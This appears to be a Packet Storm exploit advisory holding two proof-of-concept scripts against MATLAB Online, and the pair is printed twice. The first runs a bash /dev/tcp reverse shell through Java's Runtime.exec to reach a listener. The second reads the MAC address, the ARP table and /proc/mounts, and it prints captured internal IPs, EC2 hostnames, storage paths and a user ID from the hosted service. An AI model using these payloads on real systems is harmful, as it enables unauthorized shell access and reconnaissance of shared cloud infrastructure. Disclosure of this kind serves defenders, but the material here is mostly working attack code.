Description
MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure...
Basic Information
ID
PACKETSTORM:220735
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : MATLAB R2024a RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection.
By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.
[+] POC : place the code below in the command prompt of the MATLAB
host = '127.0.0.1'; port = 4444;
payload = sprintf('bash -i >& /dev/tcp/%s/%d 0>&1', host, port);
try
java.lang.Runtime.getRuntime().exec({'bash', '-c', payload});
fprintf('Payload executed. Check your nc listener.\n');
catch ME
fprintf('Execution failed: %s\n', ME.message);
end
function copy_stream(i, o), try, b = zeros(1,1024,'int8'); while true, l = i.read(b); if l<=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end
[+] At the same time, we open the listening from the Natkat and wait for the reverse connection. Cmd line: -lvp 4444
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
==================================================================================================================================
| # Title : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
[+] POC : place the code below in the command prompt of the MATLAB
try
eth0_mac = fileread('/sys/class/net/eth0/address');
fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
catch
disp('Could not read eth0 MAC.');
end
[status, arp_info] = system('arp -a');
if status == 0
disp('Internal Network Neighbors:');
disp(arp_info);
else
disp('ARP command restricted, trying proc/net/arp...');
try
arp_proc = fileread('/proc/net/arp');
disp(arp_proc);
catch
disp('ARP info is fully protected.');
end
end
[status, mount_details] = system('cat /proc/mounts');
disp('Mount Points Analysis:');
disp(mount_details);
[+] Rzlt :
CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
Internal Network Neighbors:
ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
Mount Points Analysis:
none / overlay ro,relatime,lowerdir=mnt:etc:/private/bundles/matlab/layer:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ce13c7ea78933334c2e1bafc9e/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/3afba3aa964848d5d9fd73e385/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/74d0e1fcc28e73c6d1e9a5897c/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/5c9144a16da17f0cc8248d4025/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2341c3a87f2dabed6c6aa19a00/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/62649978667e9eab27cf0c43d5/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ac06d2cfa1a32e02a82738120f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d687193fa35a62c0d4e87f4851/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/f11bb60810ad7033c841775d67/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/b50fab0d3d288a6f7616b2e793/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/06d5f727f08cb4d3b92cdcd82f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/4a09ce1ff1f00a289c0c3a60a1/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/e5d8f28f87d2ba2720f9825dd4/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/eb28f642e70c727c67f8d88a18/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/1fb507001f9f8b7a11adf33d83/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d09af82c869438ebd387274aac/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2f7571f14c6ff1d57c690bd192/data,upperdir=/private/bundles/matlab/rootfs.upper,workdir=/private/bundles/matlab/rootfs.work,uuid=on,xino=off,nouserxattr 0 0
/dev/nvme1n1 /opt/mlsedu/matlab/SupportPackage ext4 ro,relatime,discard 0 0
/dev/root /home/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /users ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /MATLAB ext4 ro,relatime,discard 0 0
/dev/root /OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /SupportPackages ext4 ro,relatime,discard 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
overlay:gds://(session_data)/!/ /.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(AddOns)/!/ /MATLAB\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
/dev/root /users/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : MATLAB R2024a RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection.
By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.
[+] POC : place the code below in the command prompt of the MATLAB
host = '127.0.0.1'; port = 4444;
payload = sprintf('bash -i >& /dev/tcp/%s/%d 0>&1', host, port);
try
java.lang.Runtime.getRuntime().exec({'bash', '-c', payload});
fprintf('Payload executed. Check your nc listener.\n');
catch ME
fprintf('Execution failed: %s\n', ME.message);
end
function copy_stream(i, o), try, b = zeros(1,1024,'int8'); while true, l = i.read(b); if l<=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end
[+] At the same time, we open the listening from the Natkat and wait for the reverse connection. Cmd line: -lvp 4444
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
==================================================================================================================================
| # Title : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
[+] POC : place the code below in the command prompt of the MATLAB
try
eth0_mac = fileread('/sys/class/net/eth0/address');
fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
catch
disp('Could not read eth0 MAC.');
end
[status, arp_info] = system('arp -a');
if status == 0
disp('Internal Network Neighbors:');
disp(arp_info);
else
disp('ARP command restricted, trying proc/net/arp...');
try
arp_proc = fileread('/proc/net/arp');
disp(arp_proc);
catch
disp('ARP info is fully protected.');
end
end
[status, mount_details] = system('cat /proc/mounts');
disp('Mount Points Analysis:');
disp(mount_details);
[+] Rzlt :
CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
Internal Network Neighbors:
ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
Mount Points Analysis:
none / overlay ro,relatime,lowerdir=mnt:etc:/private/bundles/matlab/layer:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ce13c7ea78933334c2e1bafc9e/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/3afba3aa964848d5d9fd73e385/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/74d0e1fcc28e73c6d1e9a5897c/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/5c9144a16da17f0cc8248d4025/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2341c3a87f2dabed6c6aa19a00/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/62649978667e9eab27cf0c43d5/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ac06d2cfa1a32e02a82738120f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d687193fa35a62c0d4e87f4851/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/f11bb60810ad7033c841775d67/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/b50fab0d3d288a6f7616b2e793/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/06d5f727f08cb4d3b92cdcd82f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/4a09ce1ff1f00a289c0c3a60a1/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/e5d8f28f87d2ba2720f9825dd4/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/eb28f642e70c727c67f8d88a18/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/1fb507001f9f8b7a11adf33d83/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d09af82c869438ebd387274aac/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2f7571f14c6ff1d57c690bd192/data,upperdir=/private/bundles/matlab/rootfs.upper,workdir=/private/bundles/matlab/rootfs.work,uuid=on,xino=off,nouserxattr 0 0
/dev/nvme1n1 /opt/mlsedu/matlab/SupportPackage ext4 ro,relatime,discard 0 0
/dev/root /home/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /users ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /MATLAB ext4 ro,relatime,discard 0 0
/dev/root /OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /SupportPackages ext4 ro,relatime,discard 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
overlay:gds://(session_data)/!/ /.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(AddOns)/!/ /MATLAB\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
/dev/root /users/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================